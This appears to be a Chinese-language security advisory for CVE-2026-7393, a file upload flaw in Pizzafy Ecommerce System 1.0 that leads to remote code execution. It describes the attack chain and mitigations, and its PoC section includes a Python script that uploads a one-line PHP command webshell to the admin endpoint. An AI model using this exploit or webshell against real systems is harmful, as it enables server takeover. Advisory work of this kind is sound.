CVE-2026-7393 CVSS 4.7 中危

CVE-2026-7393 SourceCodester Pizzafy 文件上传漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7393

漏洞类型

文件上传漏洞

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0版本存在安全漏洞。该漏洞位于文件扩展处理组件的`/admin/admin_class_novo.php`文件中的`save_menu`函数。由于对参数`img`缺乏有效的过滤，导致攻击者可上传恶意文件。此漏洞可被远程利用，且已有公开漏洞利用代码，对系统安全构成威胁。

技术细节

该漏洞源代码位于SourceCodester Pizzafy Ecommerce System 1.0的`/admin/admin_class_novo.php`文件中的`save_menu`函数。系统在处理菜单图片上传功能时，未能有效校验`img`参数所携带的文件扩展名及MIME类型。攻击者可利用此缺陷，构造包含恶意Webshell代码的PHP文件，并将其通过该接口上传至服务器Web目录。由于CVSS向量显示需要高权限（PR:H），攻击者需先获取管理员账号权限。上传成功后，攻击者只需通过浏览器访问该文件的路径，即可触发服务器端解析执行PHP代码，从而实现远程代码执行（RCE），完全控制受害服务器。

攻击链分析

STEP 1

1. 身份认证

攻击者首先需要获取该系统的管理员账号权限，因为该漏洞需要高权限用户交互（PR:H）。

STEP 2

2. 构造Payload

攻击者准备包含恶意PHP代码的文件（如Webshell），用于后续的远程代码执行。

STEP 3

3. 发起上传请求

攻击者向`/admin/admin_class_novo.php`的`save_menu`接口发送POST请求，在`img`参数中植入恶意文件。

STEP 4

4. 执行代码

文件上传成功后，攻击者通过浏览器访问上传的恶意文件路径，触发服务器解析并执行恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://target.com/admin/admin_class_novo.php"

# Prepare the malicious file payload
files = {
    'img': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'image/jpeg')
}
data = {
    'save_menu': '1',
    # Other required parameters depending on the form
}

# Send the POST request to upload the file
response = requests.post(target_url, files=files, data=data)

if response.status_code == 200:
    print("File uploaded successfully.")
    # Check the response to find the file path or access the shell
else:
    print("Upload failed.")

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议通过WAF（Web应用防火墙）拦截针对`/admin/admin_class_novo.php`路径的异常POST请求。同时，严格限制管理员后台的访问来源IP，并检查服务器上是否存在未知的可疑PHP文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7393
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7393
3 Details https://www.cvedetails.com/cve/CVE-2026-7393/
4 VulDB https://vuldb.com/cve/CVE-2026-7393
5 Link https://github.com/Xmyronn/Unrestricted-File-Upload-leading-to-Remote-Code-Execution-in-Pizzafy-Ecommerce-System.git
6 Link https://vuldb.com/submit/803522
7 Link https://vuldb.com/vuln/360118
8 Link https://vuldb.com/vuln/360118/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表